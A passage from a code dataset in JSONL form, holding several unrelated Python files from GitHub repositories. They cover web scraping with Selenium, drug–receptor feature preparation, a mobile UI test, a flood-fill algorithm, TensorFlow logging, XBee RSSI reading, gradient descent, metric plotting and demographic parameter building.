elemento.get_attribute('outerHTML')\n\n            # Refresh the cached HTML content\n            self.update_html_content()\n\n            # Save the HTML content\n            self.save_html_content(filename=filename)\n\n            # Close the browser\n            self.close_driver()\n        except Exception as e:\n            msg = f\"\\t--> ERROR: Could not fetch data\\n\\t--> Driver.save_html_after_find()\\nError: {e}\"\n            cprint(msg)\n            o_fmt_error('0005', msg, 'Class__Driver')\n\n    def scrap_url(self, url, alias, delay=20, save_method='find'):\n\n        # Open a driver\n        self.open_driver()\n\n        # Load the target page\n        self.open_url(url)\n\n        # Build the file name\n        filename = f'html_{alias}.dat'\n        filepath = f'{self.results_path}/{filename}'\n\n        # Refresh the object's HTML content and save the page after a delay\n        if save_method == 'wait':\n            self.save_html_after_delay(delay=delay, filename=filepath)\n\n        # Save the HTML content once the page element appears\n        if save_method == 'find':\n            self.save_html_after_find(timeout=delay, filename=filepath)\n\n        # Close the browser to free resources\n        self.close_driver()\n\n        return filepath\n\n    def scrap_url_list(self, input_list, delay=20):\n        \"\"\"\n        Args:\n            input_list: list of URLs to scrape. 
Format: (url, alias) tuples.\n        \"\"\"\n\n        for kk, input_element in enumerate(input_list):\n            url = input_element[0]\n            alias = input_element[1]\n\n            self.print_scrap_message(url, (kk+1), len(input_list))\n\n            self.scrap_url(url, alias, delay=delay)\n\n    def print_scrap_message(self, url, iter=None, total=None):\n        if iter is not None and total is not None:\n            cprint('Driver --> Scrap ({}/{})'.format(iter, total))\n        cprint('\\t--> URL: {}'.format(url))\n\n# Usage example\nif __name__ == \"__main__\":\n    # Create the driver object\n    driver = Driver(browser=\"chrome\")\n\n    # Build a list of websites to visit\n    url_list = [\n        ('https://www.similarweb.com/website/youtube.com/', 'youtube'),\n        ('https://www.similarweb.com/website/google.com/', 'google'),\n    ]\n\n    # Other examples\n    # driver.open_url(\"https://www.ejemplo.com\")\n    # driver.open_url(\"https://www.similarweb.com/top-websites/\")\n\n    # Fetch the HTML code for those pages\n    driver.scrap_url_list(url_list, 20)\n\n    # Close the page\n    driver.close_driver()\n","repo_name":"santinieto/latinframe_soft","sub_path":"src/driver.py","file_name":"driver.py","file_ext":"py","file_size_in_byte":7261,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36240372654","text":"# This script concatenates an array of drug features to an array of\n# receptor features\n\nimport glob\nimport numpy as np\nimport pickle\nimport pandas as pd\nfrom tqdm import tqdm\n\n\n# Load drug vectors\ndef drug_vecs():\n    drug_vecs = pickle.load(open(\"vectors.pkl\", 'rb'))\n    print(\"Storing drug vectors\")\n    drugs = interactions['ligand']\n    X_drugs = drug_vecs.loc[drugs]\n    print(\"Drug features shape:\", X_drugs.shape)\n    return X_drugs\n\n\n# Load receptor vectors\ndef receptor_vecs():\n    receptor_vecs = pd.read_csv(\"all_receptor_vecs.csv\", index_col=0)\n    print(\"Storing receptor vectors\")\n    receptors = interactions['receptor']\n    X_receptors = receptor_vecs.loc[receptors]\n    print(\"Receptor features shape:\", X_receptors.shape)\n    return X_receptors\n\n\nif __name__ == \"__main__\":\n    # Read data of receptor ids\n    receptor_data = glob.glob(\"receptor_ids/*.csv\")\n    cols = [\"Uniprot ID\", \"GeneSymbol\"]\n    receptor_ids = pd.DataFrame(columns=cols)\n\n    for f in receptor_data:\n        data = pd.read_csv(f)\n        receptor_ids = pd.concat([receptor_ids, data], axis=0)\n\n    all_files = glob.glob(\"ligands/*/*.csv\")\n    cols = [\"receptor\", \"ligand\", \"affinity\"]\n    interactions = pd.DataFrame(columns=cols)\n\n    # Open each ligand file and store the receptor, ligands and activity\n    print(\"Storing interactions\")\n    for f in tqdm(all_files[:300]):\n        temp_df = pd.DataFrame(columns=cols)\n        receptor = f.replace(\"_ligands.csv\", \"\").split(\"/\")[-1]\n        r_id = receptor_ids.loc[receptor_ids.GeneSymbol == receptor]['Uniprot ID']\n        ligfile = pd.read_csv(f)\n        num_ligands = ligfile.shape[0]\n        ligs = ligfile['molecule_chembl_id']\n        affinities = ligfile['pchembl_value']\n        temp_df['receptor'] = np.full(num_ligands, r_id)\n        temp_df['ligand'] = ligs\n        temp_df['affinity'] = affinities\n        interactions = pd.concat([interactions, temp_df], axis=0)\n    # Drop NAs\n    interactions = interactions.dropna()\n    interactions.to_csv(\"interactions.csv\")\n    print(\"Interactions:\", interactions.shape)\n\n    X_drugs = drug_vecs()\n    X_receptors = receptor_vecs()\n\n    # Combine features\n    X = np.concatenate([X_receptors, X_drugs], axis=1)\n    print(\"All features shape:\", X.shape)\n\n    # Extract values\n    Y = np.array(interactions['affinity'])\n    
print(\"Y values shape:\", Y.shape)\n\n # Save \n print(\"Pickling\")\n pickle.dump(X, open(\"X_features.pkl\", 'wb'))\n pickle.dump(Y, open(\"Y_values.pkl\", 'wb'))\n print(\"Saving to file\")\n np.savetxt(\"X_features.csv\", X, delimiter=\",\")\n np.savetxt(\"Y_values.csv\", Y, delimiter=\",\")\n","repo_name":"ravila4/DTIpred","sub_path":"src/features/prepare_data.py","file_name":"prepare_data.py","file_ext":"py","file_size_in_byte":2611,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"38614927068","text":"from test_prog.lib_classes.cls_new_test import BaseTest\nfrom test_prog import lib_app_windows as law\nfrom time import sleep\n\n\nclass Test(BaseTest):\n def test_name(self):\n \"\"\"User should be able to authenticate via email\"\"\"\n # Arrange:\n sleep(5)\n description = law.WinStartRegistration.BTN_SIGN_IN_WITH_EMAIL\n email_btn = self.driver.find_obj(description)\n email_btn.click()\n sleep(10)\n\n # Act:\n description = law.RegistrationByEmail.LABEL_SET_EMAIL\n email_field = self.driver.find_obj(description)\n email_field.click()\n email_field.send_keys('test@shlokas.app')\n sleep(3)\n\n description = law.RegistrationByEmail.BTN_SEND_EMAIL\n submit = self.driver.find_obj(description)\n submit.click()\n sleep(10)\n\n # Assert:\n description = law.WindowLibrary.BTN_DWN_BAR_SETTING\n setting = self.driver.find_obj(description)\n setting.click()\n sleep(3)\n\n description = law.WindowSetting.SLD_ACCOUNT\n account = self.driver.find_obj(description)\n account.click()\n sleep(5)\n\n description = law.SubWinAccount.TXT_WELCOME\n welcome = self.driver.find_obj(description)\n self.assertTrue(welcome)\n\n\nif __name__ == '__main__':\n print('тест запускается с body_test.py')\n","repo_name":"akdasa-studios/shlokas-e2e-mobile","sub_path":"test_prog/lib_tests/test_00.py","file_name":"test_00.py","file_ext":"py","file_size_in_byte":1366,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"2418413501","text":"# 202203011001\n# https://leetcode-cn.com/problems/flood-fill/comments/\n# 英文说明更好懂 https://leetcode.com/problems/flood-fill/comments/\n# +-+-+-+ +-+-+-+\n# |1|1|1| |2|2|2|\n# +-+-+-+ +-+-+-+\n# |1|1|0| -> |2|2|0|\n# +-+-+-+ +-+-+-+\n# |1|0|1| |2|0|2|\n# +-+-+-+ +-+-+-+\nfrom typing import List\n\n\nclass Solution:\n def floodFill(self, image: List[List[int]], sr: int, sc: int, newColor: int) -> List[List[int]]:\n # 深度优先算法\n oldColor = image[sr][sc]\n dfs(image, sr, sc, oldColor, newColor)\n return image\n\n\ndef dfs(image, sr, sc, oldColor, newColor):\n if sr < 0 or sr >= len(image):\n return image\n if sc < 0 or sc >= len(image[sr]):\n return image\n if image[sr][sc] != oldColor or image[sr][sc] == newColor:\n return image\n image[sr][sc] = newColor\n dfs(image, sr - 1, sc, oldColor, newColor)\n dfs(image, sr + 1, sc, oldColor, newColor)\n dfs(image, sr, sc - 1, oldColor, newColor)\n dfs(image, sr, sc + 1, oldColor, newColor)\n","repo_name":"alex-1q84/leetcode","sub_path":"python/src/leetcode/begin_algorithm/flood_fill.py","file_name":"flood_fill.py","file_ext":"py","file_size_in_byte":1057,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19788787214","text":"import tensorflow as tf\n\n\nclass TFLogger:\n \n def __init__(self, summary_names, session):\n self.log_ops = {}\n self.session = session\n # register summaries\n for name in summary_names:\n if name not in self.log_ops:\n ph = 
\n                summary = tf.summary.scalar(\n                    name=name,\n                    tensor=ph\n                )\n                self.log_ops[name] = ph\n        self.merged = tf.summary.merge_all()\n\n    def create_writer(self, log_dir):\n        return tf.summary.FileWriter(log_dir, self.session.graph)\n\n    def log(self, writer, log_dict, step):\n        feed_dict = {}\n        for name, value in log_dict.items():\n            if name not in self.log_ops:\n                continue\n            # fill the placeholders\n            feed_dict[self.log_ops[name]] = value\n        fetches = {'summary': self.merged}\n        fetched = self.session.run(fetches, feed_dict=feed_dict)\n        writer.add_summary(fetched['summary'], global_step=step)\n        writer.flush()
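\n\n# Editor's illustrative usage sketch (TF1-style API; names and paths are hypothetical):\n#   sess = tf.Session()\n#   tf_logger = TFLogger(['loss', 'accuracy'], sess)\n#   writer = tf_logger.create_writer('/tmp/tf_logs')\n#   tf_logger.log(writer, {'loss': 0.42, 'accuracy': 0.9}, step=1)\n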
\"ON\"\n\t\telse:\n\t\t\tself.LED_buffer.appendleft(0)\n\t\t\tself.bollard_command = \"OFF\"\n\t\t#if not 0 in self.LED_buffer:\n\t\t#\tself.bollard_command = \"ON\"\n\t\t#else:\n\t\t#\tself.bollard_command = \"OFF\"\n\t\t#print(self.bollard_command + \" \", end=\"\\r\")\n\t\t\t\nif __name__ == \"__main__\":\n\t\n\tmyXbeeDir = XbeeDir(\"/dev/ttyUSB0\")\n\t\n\twhile True:\n\t\ttry:\n\t\t\ttime.sleep(0.0001)\n\t\texcept KeyboardInterrupt:\n\t\t\tbreak\n\t\n\tmyXbeeDir.xbee.halt()\n\tmyXbeeDir.serial_port.close()\n","repo_name":"goowza/Project_Drogon","sub_path":"raspberry/Borne/RSSI_Receive.py","file_name":"RSSI_Receive.py","file_ext":"py","file_size_in_byte":2829,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21446432576","text":"import random\r\n\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom pandas import DataFrame,Series\r\nfrom sklearn.linear_model import LinearRegression\r\n\r\n# 读取数据\r\ndatafile = './dataset/housing.xlsx'\r\ndata = pd.read_excel(datafile)\r\nexamDf = np.mat(data)\r\nm = len(examDf)\r\nmin = examDf.min(axis=0)\r\nmax = examDf.max(axis=0)\r\n# 标准化\r\nfor i in range(0,14):\r\n examDf[:, i] = (examDf[:, i] - min[0,i]) / (max[0,i] - min[0,i])\r\n\r\n#分离X和Y\r\nX = examDf[:,0:13]\r\nY = examDf[:,13:14]\r\n# print(X)\r\n# print(Y)\r\n\r\n# 代价函数,求每个样本方程计算的值与实际值的差值\r\ndef computeCostDeri(X, Y, theta):\r\n return np.dot(X, theta) - Y\r\n#代价函数cost,用于计算每轮迭代的代价\r\ndef computeCost(inner):\r\n inner = np.power(inner, 2)\r\n return np.sum(inner) / (2 * m)\r\n# 批量梯度下降BGD\r\ndef BGD(X, Y, theta, alpha, turn):\r\n ret = np.zeros(turn) #ret保存每次迭代计算的代价cost\r\n error = 0\r\n for t in range(0, turn):\r\n # 每步循环,求各样本损失函数inner\r\n inner = computeCostDeri(X,Y,theta)\r\n error = computeCost(inner)\r\n ret[t] = error\r\n cost = np.zeros((13,1))\r\n for i in range(0, m):\r\n cost += inner[i,0] * X[i,:].T\r\n theta = theta - cost * alpha / m\r\n if error <= 1e-15:\r\n break\r\n return ret\r\n\r\n\r\nalpha = 0.001\r\ntheta = np.zeros((13, 1))\r\nturn = 1000\r\nret = BGD(X, Y, theta, alpha, turn)\r\nprint(ret)\r\n\r\n# BGD图表\r\nnumx = []\r\nnumy = []\r\nstep = 50\r\nfor i in range(0, 20):\r\n numx.append(i * step)\r\n cur = ret[i * step]\r\n numy.append(cur)\r\nplt.xlabel('iteration')\r\nplt.ylabel('cost')\r\nplt.plot(numx, numy)\r\nplt.title('BGD')\r\nplt.show()\r\n","repo_name":"LieFlatRemi/MachineLearningHw","sub_path":"01-GradientDescent/week03BGD.py","file_name":"week03BGD.py","file_ext":"py","file_size_in_byte":1744,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74859280486","text":"from constant import RESULT_CATEGORIES\n\n\n\"\"\"\nAllows to save the result of the recognition of an image with references into a csv file. 
\n\"\"\"\ndef save_result(file, time_create_hist_ref, time, distances, top, winner, test_ok, file_res):\n f = open(file_res, \"a\")\n f.write( \"Requete ;\" + file + \"\\n\\n\")\n\n f.write( \"Temps de création des histogrammes de références ;\" + str(time_create_hist_ref) + \"\\n\")\n f.write( \"Temps pour appliquer l'algorithme de reconnaissance d'image ;\" + str(time) + \"\\n\\n\")\n\n f.write(\"Résultat de la reconnaissance :\\n\")\n f.write(\"Position;Fichier;Distance\\n\")\n pos = 1\n for key, value in distances.items():\n f.write(str(pos) + \";\" + key + \";\" + str(value) + \"\\n\")\n pos = pos + 1\n\n f.write(\"\\nTop \" + str(len(top)) + \" :\\n\")\n f.write(\"Position;Fichier;Distance\\n\")\n pos = 1\n for key, value in top.items():\n f.write(str(pos) + \";\" + key + \";\" + str(value) + \"\\n\")\n pos = pos + 1\n\n if winner is None:\n winner = \"Inconnu\"\n f.write(\"\\nRésultat obtenu ;\" + winner)\n resul_wanted = RESULT_CATEGORIES[file]\n if RESULT_CATEGORIES[file] is None:\n resul_wanted = \"Inconnu\"\n f.write(\"\\nRésultat attendu ;\" + resul_wanted )\n f.write(\"\\nTest OK ;\" + str(test_ok) + \"\\n\\n\")\n\n f.close()\n\n","repo_name":"bdeleglise/Pictorial-content-description","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1298,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10694615453","text":"from matplotlib import pyplot as plt\nimport seaborn as sns\nimport numpy as np\nimport os\n\ndef plot_evaluations(k_eval_df, save_dir, run):\n \"\"\"\n dir_type: Directory type, which refers to if folders structured k/plots/eval or plots/eval/plottype/run.png\n \"\"\"\n\n plt.figure(figsize=(10, 7))\n\n plt.title('Accuracy')\n plt.xlabel('Epoch')\n plt.ylabel('Accuracy')\n plt.plot(k_eval_df['Epoch'], k_eval_df['Train Accuracy'], label='Training')\n plt.plot(k_eval_df['Epoch'], k_eval_df['Validation Accuracy'], label='Validation')\n plt.legend()\n name = str(run)+'_accuracy.png'\n plt.savefig(save_dir+'/plots/accuracies/'+name)\n plt.clf()\n\n # Plot train/validation auc\n plt.title('AUC')\n plt.xlabel('Epoch')\n plt.ylabel('AUC')\n plt.plot(k_eval_df['Epoch'], k_eval_df['Train AUC'], label='Training AUC')\n plt.plot(k_eval_df['Epoch'], k_eval_df['Validation AUC'], label='Validation AUC')\n plt.legend()\n name = 'AUC/'+str(run)+'_AUC.png'\n plt.savefig(save_dir+'/plots'+'/'+name)\n plt.clf()\n\n # Plot training loss\n plt.title('Loss')\n plt.xlabel('Epoch')\n plt.ylabel('Loss')\n plt.plot(k_eval_df['Epoch'], k_eval_df['Train Loss'], label='Training')\n plt.plot(k_eval_df['Epoch'], k_eval_df['Validation Loss'], label='Validation')\n plt.legend()\n name = str(run)+'_loss.png'\n plt.savefig(save_dir+'/plots/loss/'+name)\n plt.clf()\n\n # Plot points in margin\n plt.title('Points in Margin')\n plt.xlabel('Epoch')\n plt.ylabel('Points in Margin')\n plt.plot(k_eval_df['Epoch'], k_eval_df['Train in Margin'], label='Train')\n plt.plot(k_eval_df['Epoch'], k_eval_df['Validation in Margin'], label='Validation')\n plt.legend()\n name = 'margin/'+str(run)+'_points_in_margin.png'\n plt.savefig(save_dir+'/plots'+'/'+name)\n plt.clf()\n\n\ndef plot_params(param_dict, save_dir, run):\n os.makedirs(save_dir+'/plots/parameters/'+str(run))\n plt.figure(figsize=(12,8))\n for name, params in param_dict.items():\n x = range(params.shape[1])\n for param_series in params:\n plt.plot(x, param_series)\n plt.title(name)\n plt.xlabel('Epoch')\n plt.ylabel('Weight')\n \n 
plt.savefig(save_dir+'/plots/parameters/'+str(run)+'/'+name+'.png', dpi=150)\n plt.clf()\n\n\ndef plot_confusion(train_confusion, valid_confusion, save_dir, run):\n try:\n plt.figure(figsize=(9,6))\n total_train = np.sum(train_confusion[0])\n total_valid = np.sum(valid_confusion[0])\n\n plt.title('Train Confusion Matrix')\n plt.xlabel('Epoch')\n plt.ylabel('Percent Classified')\n plt.plot(range(len(train_confusion)), train_confusion[:,0,0]/total_train, label='True Negative')\n plt.plot(range(len(train_confusion)), train_confusion[:,0,1]/total_train, label='False Positive')\n plt.plot(range(len(train_confusion)), train_confusion[:,1,1]/total_train, label='True Positive')\n plt.plot(range(len(train_confusion)), train_confusion[:,1,0]/total_train, label='False Negative')\n plt.legend()\n plt.savefig(save_dir+'/plots/confusion/'+str(run)+'/train_confusion_'+str(run)+'.png')\n plt.clf()\n\n plt.title('Validation Confusion Matrix')\n plt.xlabel('Epoch')\n plt.ylabel('Percent Classified')\n plt.plot(range(len(valid_confusion)), valid_confusion[:,0,0]/total_valid, label='True Negative')\n plt.plot(range(len(valid_confusion)), valid_confusion[:,0,1]/total_valid, label='False Positive')\n plt.plot(range(len(valid_confusion)), valid_confusion[:,1,1]/total_valid, label='True Positive')\n plt.plot(range(len(valid_confusion)), valid_confusion[:,1,0]/total_valid, label='False Negative')\n plt.legend()\n plt.savefig(save_dir+'/plots/confusion/'+str(run)+'/valid_confusion_'+str(run)+'.png')\n plt.clf()\n\n plt.title('True Positive')\n plt.xlabel('Epoch')\n plt.ylabel('Percent Classified')\n plt.plot(range(len(train_confusion)), train_confusion[:,1,1]/total_train, label='Train')\n plt.plot(range(len(valid_confusion)), valid_confusion[:,1,1]/total_valid, label='Validation')\n plt.legend()\n plt.savefig(save_dir+'/plots/confusion/'+str(run)+'/true_positive_'+str(run)+'.png')\n plt.clf()\n\n plt.title('False Negative')\n plt.xlabel('Epoch')\n plt.ylabel('Percent Classified')\n plt.plot(range(len(train_confusion)), train_confusion[:,1,0]/total_train, label='Train')\n plt.plot(range(len(valid_confusion)), valid_confusion[:,1,0]/total_valid, label='Validation')\n plt.legend()\n plt.savefig(save_dir+'/plots/confusion/'+str(run)+'/false_negative_'+str(run)+'.png')\n plt.clf()\n\n plt.title('True Negative')\n plt.xlabel('Epoch')\n plt.ylabel('Percent Classified')\n plt.plot(range(len(train_confusion)), train_confusion[:,0,0]/total_train, label='Train')\n plt.plot(range(len(valid_confusion)), valid_confusion[:,0,0]/total_valid, label='Validation')\n plt.legend()\n plt.savefig(save_dir+'/plots/confusion/'+str(run)+'/true_negative_'+str(run)+'.png')\n plt.clf()\n\n plt.title('False Positive')\n plt.xlabel('Epoch')\n plt.ylabel('Percent Classified')\n plt.plot(range(len(train_confusion)), train_confusion[:,0,1]/total_train, label='Train')\n plt.plot(range(len(valid_confusion)), valid_confusion[:,0,1]/total_valid, label='Validation')\n plt.legend()\n plt.savefig(save_dir+'/plots/confusion/'+str(run)+'/false_positive_'+str(run)+'.png')\n plt.clf()\n\n plt.title('Total Positive')\n plt.xlabel('Epoch')\n plt.ylabel('Percent Classified Positive')\n plt.plot(range(len(train_confusion)), (train_confusion[:,0,1]+train_confusion[:,1,1])/total_train, label='Train')\n plt.plot(range(len(valid_confusion)), (valid_confusion[:,0,1]+valid_confusion[:,1,1])/total_valid, label='Validation')\n plt.legend()\n plt.savefig(save_dir+'/plots/confusion/'+str(run)+'/total_positive_'+str(run)+'.png')\n plt.clf()\n\n plt.title('Total Negative')\n 
plt.xlabel('Epoch')\n        plt.ylabel('Percent Classified Negative')\n        plt.plot(range(len(train_confusion)), (train_confusion[:,0,0]+train_confusion[:,1,0])/total_train, label='Train')\n        plt.plot(range(len(valid_confusion)), (valid_confusion[:,0,0]+valid_confusion[:,1,0])/total_valid, label='Validation')\n        plt.legend()\n        plt.savefig(save_dir+'/plots/confusion/'+str(run)+'/total_negative_'+str(run)+'.png')\n        plt.clf()\n    except Exception:\n        print(\"Confusion matrices too small again?\")\n\n\ndef plot_classifications(train_pred, valid_pred, train_labels, valid_labels, test_correct, save_dir, run):\n    sns.heatmap(train_pred)\n    plt.title('Training Set Correct')\n    plt.savefig(save_dir+'/classifications/'+str(run)+'_train_correct.png')\n    plt.clf()\n    sns.heatmap(valid_pred)\n    plt.title('Validation Set Correct')\n    plt.savefig(save_dir+'/classifications/'+str(run)+'_validation_correct.png')\n    plt.clf()\n    sns.heatmap(test_correct)\n    plt.title('Test Set Correct')\n    plt.savefig(save_dir+'/classifications/'+str(run)+'_test_correct.png')\n    plt.clf()\n\n    train_pos_i = np.where(train_labels == 1)\n    train_neg_i = np.where(train_labels == -1)\n    train_correct_only_pos = train_pred[train_pos_i]\n    train_correct_only_neg = train_pred[train_neg_i]\n    sns.heatmap(train_correct_only_pos)\n    plt.title('Training Set Correct Positive')\n    plt.savefig(save_dir+'/classifications/only_pos/'+str(run)+'_train_correct.png')\n    plt.clf()\n    sns.heatmap(train_correct_only_neg)\n    plt.title('Training Set Correct Negative')\n    plt.savefig(save_dir+'/classifications/only_neg/'+str(run)+'_train_correct.png')\n    plt.clf()\n\n    valid_pos_i = np.where(valid_labels == 1)\n    valid_neg_i = np.where(valid_labels == -1)\n    valid_correct_only_pos = valid_pred[valid_pos_i]\n    valid_correct_only_neg = valid_pred[valid_neg_i]\n    sns.heatmap(valid_correct_only_pos)\n    plt.title('Validation Set Correct Positive')\n    plt.savefig(save_dir+'/classifications/only_pos/'+str(run)+'_valid_correct.png')\n    plt.clf()\n    sns.heatmap(valid_correct_only_neg)\n    plt.title('Validation Set Correct Negative')\n    plt.savefig(save_dir+'/classifications/only_neg/'+str(run)+'_valid_correct.png')\n    plt.clf()","repo_name":"T-Muha/senior-design-GNNs-for-FC-fingerprinting","sub_path":"pipeline/utils/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":8399,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"9984595332","text":"import tensorflow as tf\nimport pandas as pd\nimport numpy as np\nfrom sklearn.utils import shuffle\nfrom sklearn.model_selection import train_test_split\n\nfrom constants import *\n\n\ndef data_loader(sales_df, calendar_df):\n    def window(x):\n        sale = np.expand_dims(timesales[x[0], x[1]:batch_size + x[1]], axis=-1)\n        info = infos[x[0]]\n        day = info_day[x[1]:batch_size + x[1]]\n        return np.concatenate([sale, day], axis=1), info, sale[::-1]\n\n    timesales = sales_df[[\n        \"d_\" + str(i) for i in range(firstDay, lastDay)]].values.astype(\"float32\")\n    infos = sales_df[[\"enc_store_id\", \"enc_item_id\"]].values\n    info_day = calendar_df[[\"cenc_year\", \"cenc_month\",\n                            \"cenc_weekday\", \"cenc_event_name_1\"]].values\n\n    index = np.zeros([len(timesales), len(timesales[0]) - batch_size - 1],\n                     dtype=\"int32\")\n    index = np.array(np.where(index == 0), dtype=\"int32\").T\n    index = shuffle(index, random_state=0)\n\n    train_idx, val_idx = train_test_split(index, test_size=0.2)\n\n    # ------- tensorflow data pipe settings ------\n    train_ds = tf.data.Dataset.from_tensor_slices(train_idx)\n    train_ds = train_ds.shuffle(buffer_size=1000000)
\n    train_ds = train_ds.map(lambda x: tf.py_function(\n        window, [x], [tf.float32, tf.float32, tf.float32]))\n    train_ds = train_ds.batch(batch_size).prefetch(buffer_size=AUTOTUNE)\n\n    val_ds = tf.data.Dataset.from_tensor_slices(val_idx)\n    val_ds = val_ds.map(lambda x: tf.py_function(\n        window, [x], [tf.float32, tf.float32, tf.float32]))\n    val_ds = val_ds.batch(512).prefetch(buffer_size=AUTOTUNE)\n    return train_ds, val_ds\n
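\n# Editor's illustrative usage sketch (assumes sales_df/calendar_df dataframes and\n# that batch_size, firstDay, lastDay and AUTOTUNE are defined in `constants`):\n#   train_ds, val_ds = data_loader(sales_df, calendar_df)\n#   for window_batch, info_batch, target_batch in train_ds.take(1):\n#       print(window_batch.shape)\n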
","repo_name":"gpi-yama/LSTM_embedder_for_kaggle","sub_path":"datapipe.py","file_name":"datapipe.py","file_ext":"py","file_size_in_byte":1650,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"19951416591","text":"#! /usr/bin/env python\n\n\nimport argparse\nimport logging\nimport os\nimport sys\nimport population\nimport ipp_macro_series_parser.scripts.demographic_projections_downloader as dpd\nfrom ipp_macro_series_parser.config import Config\n\napp_name = os.path.splitext(os.path.basename(__file__))[0]\nlog = logging.getLogger(app_name)\n\n\ndef run_all(pop_input_dir = None, til_input_dir = None, uniform_weight = None, parameters_dir = None, til = False):\n    if parameters_dir is None:\n        parameters_dir = os.getcwd()\n\n    if til_input_dir is not None:\n        import dependance\n        assert uniform_weight is not None\n        dependance_output_dir = os.path.join(\n            parameters_dir,\n            \"dependance\"\n            )\n        dependance.build_prevalence_2010(\n            input_dir = til_input_dir,\n            output_dir = dependance_output_dir,\n            uniform_weight = uniform_weight\n            )\n        dependance.build_prevalence_all_years(\n            input_dir = til_input_dir,\n            output_dir = dependance_output_dir,\n            to_csv = True\n            )\n\n    population_output_dir = os.path.join(parameters_dir, \"population\")\n    population.build_mortality_rates(\n        input_dir = pop_input_dir,\n        output_dir = population_output_dir,\n        to_csv = True,\n        uniform_weight = uniform_weight\n        )\n\n    population.build_deaths(\n        input_dir = pop_input_dir,\n        output_dir = population_output_dir,\n        to_csv = True,\n        uniform_weight = uniform_weight\n        )\n\n    population.build_fertility_rates(\n        input_dir = pop_input_dir,\n        output_dir = population_output_dir,\n        to_csv = True,\n        uniform_weight = uniform_weight\n        )\n\n    population.build_migration(\n        input_dir = pop_input_dir,\n        output_dir = population_output_dir,\n        to_csv = True,\n        uniform_weight = uniform_weight\n        )\n\n    population.rescale_migration(\n        input_dir = pop_input_dir,\n        output_dir = population_output_dir,\n        )\n\n\ndef main():\n    parser = argparse.ArgumentParser()\n    parser.add_argument('-d', '--download', action = 'store_true',\n        help = \"download all input files from their web sources\")\n    parser.add_argument('-v', '--verbose', action = 'store_true', default = False, help = \"increase output verbosity\")\n    parser.add_argument('-o', '--output', type = str, default = None, help = \"output directory\")\n    parser.add_argument('-p', '--pop_input', type = str, default = None, help = \"input directory for population files\")\n    parser.add_argument('-w', '--weight', default = 200, help = \"weight used for TIL-France\")\n    # TODO remove weight from here\n    parser.add_argument('-t', '--til_input', default = None,\n        help = \"input directory for til-specific files (dependance)\")\n    args = parser.parse_args()\n\n    logging.basicConfig(\n        level = logging.DEBUG if args.verbose else logging.WARNING,\n        stream = sys.stdout)\n\n    if not os.path.isabs(args.output):\n        output_dir = os.path.abspath(args.output)\n    else:\n        output_dir = args.output\n\n    if not os.path.exists(output_dir):\n        log.info('Creating directory {}'.format(output_dir))\n        os.makedirs(output_dir)\n\n    if args.download and (args.til_input or args.pop_input):\n        parser.error(\"-d cannot be used with -p nor -t\")\n\n    if args.til_input and not args.weight:\n        print(\"--weight 200 used by default\")\n\n    if args.download:\n        dpd.main()\n        files = ['insee_projections', 'drees_dependance']\n        output_dirs_by_file = {file: Config().get('data', file) for file in files}\n        pop_input = output_dirs_by_file['insee_projections']\n        til_input = output_dirs_by_file['drees_dependance']\n\n    else:\n        pop_input = os.path.abspath(args.pop_input)\n        assert os.path.exists(pop_input)\n\n        til_input = args.til_input\n\n        if til_input is not None:\n            til_input = os.path.abspath(args.til_input)\n            assert os.path.exists(til_input)\n        else:\n            til_input = None\n\n    run_all(\n        pop_input_dir = pop_input,\n        til_input_dir = til_input,\n        parameters_dir = output_dir,\n        uniform_weight = int(args.weight),\n        )\n\n\nif __name__ == \"__main__\":\n    sys.exit(main())\n","repo_name":"taxipp/ipp-macro-series-parser","sub_path":"ipp_macro_series_parser/demographie/build_parameters.py","file_name":"build_parameters.py","file_ext":"py","file_size_in_byte":4307,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"41053336790","text":"#!/usr/bin/env python3\n\n\"\"\" author: mcatamur@ucsc.edu \"\"\"\n\n\n\"\"\"\nSample Command: python IQR_tissue_outlier.py -i juncBase_table.txt/tsv\n\"\"\"\n\n\nimport csv, time, argparse\nstart_time = time.time()\nimport matplotlib.pyplot as plt\nfrom collections import defaultdict\n\n\nclass CommandLine:\n    '''\n    Takes input file and options.\n    '''\n    def __init__(self, inOpts=None):\n        '''\n        CommandLine constructor.\n        Implements a parser to interpret the command line argv string using argparse.\n        '''\n        self.parser = argparse.ArgumentParser(description = 'outputAnalyzer.py arguments',\n                                              epilog = 'For more help contact: ',\n                                              add_help = True,  # default is True\n                                              prefix_chars = '-',\n                                              usage = '%(prog)s [options] -option1[default]'\n                                              )\n        self.parser.add_argument('-i', '--inputFile', action = 'store', help = 'input file')\n        self.parser.add_argument('-dPSI', '--delta_PSI', type=float, action = 'store', help = 'delta PSI threshold', default=10.0)\n\n        if inOpts is None:\n            self.args = self.parser.parse_args()\n        else:\n            self.args = self.parser.parse_args(inOpts)\n\nclass outputAnalyzer:\n\n    def __init__(self, myCommandLine):\n        self.inputFile = myCommandLine.args.inputFile\n        self.dPSI = myCommandLine.args.delta_PSI\n        self.findTissueIndex(self.inputFile)\n        self.buildData_tissue(self.inputFile)\n        self.plotEventsBar_allTissue()\n\n    def findTissueIndex(self, inputFile):\n        print(\"Building tissue index...\")\n        self.tissue_index = defaultdict(list)\n\n        with open(self.inputFile) as file:\n            tsvReader = csv.reader(file, dialect = 'excel-tab')\n            self.header = next(tsvReader, None)\n            for ccle in range(11, len(self.header)-1):  # index of cell lines\n                a = self.header[ccle].split(\"-\")  # split ccle tag\n                if a[0] == 'BI':\n                    # Hard code four letter 